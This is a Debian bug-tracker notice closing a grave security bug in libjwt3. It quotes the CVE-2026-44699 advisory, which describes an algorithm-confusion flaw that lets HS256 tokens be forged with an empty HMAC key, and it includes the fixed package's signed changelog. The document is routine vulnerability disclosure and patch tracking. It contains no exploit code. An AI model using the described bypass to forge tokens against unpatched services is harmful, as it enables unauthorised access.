Bug#1136810: marked as done (libjwt3: CVE-2026-44699)

Debian Bug Tracking System Tue, 19 May 2026 01:07:18 -0700

Your message dated Tue, 19 May 2026 10:05:16 +0200
with message-id <[email protected]>
and subject line Re: Accepted libjwt3 3.3.3-1 (source) into unstable
has caused the Debian Bug report #1136810,
regarding libjwt3: CVE-2026-44699
to be marked as done.


This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
1136810: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1136810
Debian Bug Tracking System
Contact [email protected] with problems

--- Begin Message ---

Source: libjwt3
Version: 3.3.2-1
Severity: grave
Tags: security upstream
X-Debbugs-Cc: [email protected], Debian Security Team <[email protected]>

Hi,

The following vulnerability was published for libjwt3.

CVE-2026-44699[0]:
| LibJWT is a C JSON Web Token Library. From 3.0.0 to 3.3.2, libjwt
| accepts an RSA JWK that does not contain an alg parameter as the
| verification key for an HS256/HS384/HS512 token. In the OpenSSL
| backend, this causes HMAC verification to run with a zero-length
| key, so an attacker can forge a valid JWT without knowing any secret
| or RSA private key. This is an algorithm-confusion authentication
| bypass. It affects applications that load RSA keys from JWKS where
| alg is omitted, which is valid JWK syntax and common in real
| deployments, and then choose the verification algorithm from the JWT
| header, for example in a kid lookup callback. This vulnerability is
| fixed in 3.3.3.


If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2026-44699
    https://www.cve.org/CVERecord?id=CVE-2026-44699
[1] 
https://github.com/benmcollins/libjwt/security/advisories/GHSA-q843-6q5f-w55g
[2] 
https://github.com/benmcollins/libjwt/commit/49c730a4036c5ae67a4a97e4e55101e445fda694

Regards,
Salvatore

--- End Message ---

--- Begin Message ---

Source: libjwt3
Source-Version: 3.3.3-1

On Mon, May 18, 2026 at 09:48:46PM +0000, Debian FTP Masters wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
> 
> Format: 1.8
> Date: Mon, 04 May 2026 10:13:19 -0400
> Source: libjwt3
> Architecture: source
> Version: 3.3.3-1
> Distribution: unstable
> Urgency: medium
> Maintainer: Benjamin Collins <[email protected]>
> Changed-By: Benjamin Collins <[email protected]>
> Changes:
>  libjwt3 (3.3.3-1) unstable; urgency=medium
>  .
>    [Benjamin Collins]
>    * New upstream release
>    * Security advisory: GHSA-q843-6q5f-w55g
>      - Algorithm confusion allows JWT forgery with RSA JWK as empty-key HMAC
>      - Fixes: CVE-2026-44699
>    [Nicolas Mora <[email protected]>]
>    * Update Standards-Version to 4.7.4
>    * Remove debian/libjwt14-doc.lintian-overrides
>    * Remove Priority and Rules-Requires-Root in d/control which are useless
>      in 4.7.4
> Checksums-Sha1:
>  b10b7932a078a0253ce885f318cbbc60ae0f3031 2253 libjwt3_3.3.3-1.dsc
>  aa0c6270bba75e13d8e8a12f46a9d3d4ea45894c 606701 libjwt3_3.3.3.orig.tar.gz
>  f6e66121e3548e55dc9b43c36545f5406303da5b 5500 libjwt3_3.3.3-1.debian.tar.xz
>  31292d0321ea31e848bc1055ac1ce1d5fbbccd95 11341 
> libjwt3_3.3.3-1_amd64.buildinfo
> Checksums-Sha256:
>  d5ff99a33f07c4cc8033ec2c29679e3238f6b9dde6ebcb230ea335fa7b65f58c 2253 
> libjwt3_3.3.3-1.dsc
>  a562e5548a8e10ac6fcba64a5e6d326c15712211cb54d25242c15e8b3250b4f2 606701 
> libjwt3_3.3.3.orig.tar.gz
>  b69e2fa569b6213164f692e01968b96e0c2d6a67e1f51fba3e56eaebf3e7f021 5500 
> libjwt3_3.3.3-1.debian.tar.xz
>  1afb1c737f1b225afb158b4b26d8438b1418c6247ed74947e7f3ca221bc1a859 11341 
> libjwt3_3.3.3-1_amd64.buildinfo
> Files:
>  236e0777800cb1fad71f73cb57cfc739 2253 devel optional libjwt3_3.3.3-1.dsc
>  ad40f0b2f073ab84b43784873849f70e 606701 devel optional 
> libjwt3_3.3.3.orig.tar.gz
>  7a90757b18f9d2528851b0ff41b01326 5500 devel optional 
> libjwt3_3.3.3-1.debian.tar.xz
>  a3a747213b0378527cb08b6839279c32 11341 devel optional 
> libjwt3_3.3.3-1_amd64.buildinfo
> 
> -----BEGIN PGP SIGNATURE-----
> 
> iQIzBAEBCgAdFiEEhAWwL8wo75dEyPJT/oITlEC9IrkFAmoLhpkACgkQ/oITlEC9
> IrkKFw//dxuww6+gykrJNFi7jgPOWSbHl9gpyIjXvoC3fP6cmDTh1D7wA6flZ8+0
> BNz8AwSepsO6SHCvJ1d+E1wpyXrzDKJ5qwmcgETl0Jjzol1FcLSFLsTo/bgCbw9x
> bBU83FYvY7s9tT4U1K13GI5Zy3OKYLelnJng9T7lxMySWYvhJAqnbf9H4YKVXO5G
> YTTOkEXI2oEG5dbVllPagaV4bmgQZZ040sBycGUiC81pWEadXdx3z01cRLgq3Lbs
> EVfwBtzGqyMR+A63JRPnD1v7es82P+BSyOT/CS10DjRoxzQOzvVLpA4BWmaWS/wv
> CdtSSK0QSdnnKJ1CvyZpp6b8vS2RxvWj3svG3o3swQMWAah/TENV5GfkXTNY2/YQ
> GOgqaBPtPND3PFvOhpo5BeG3HSgTG+jAQHHJKWPe7IqFMk7o2DsKth7UlhaCdgtC
> pfVlSNjmeczPvOBSN+90KeeWOBfEXBMMf+pVcTNvXhaBdPY+aGRk3pkgNdxcRrQZ
> aq7aZEW22W9w4NVFCO7J994b+E9CCzCxiQyJQrna2b8stw3SNYMFc+yxr9uslAfe
> WFnrbd7mttZAbg8/OBlGiOmq5gi/8Tp/b6yUw8zFhW/K/QZs4YHLllBUh0c1yMp1
> njy9VKEit/v5CeRR9S9MPC3cI0M6wadT8+r0+/TRY+8jOLteJvo=
> =lZX9
> -----END PGP SIGNATURE-----

--- End Message ---

Bug#1136810: marked as done (libjwt3: CVE-2026-44699)

Reply via email to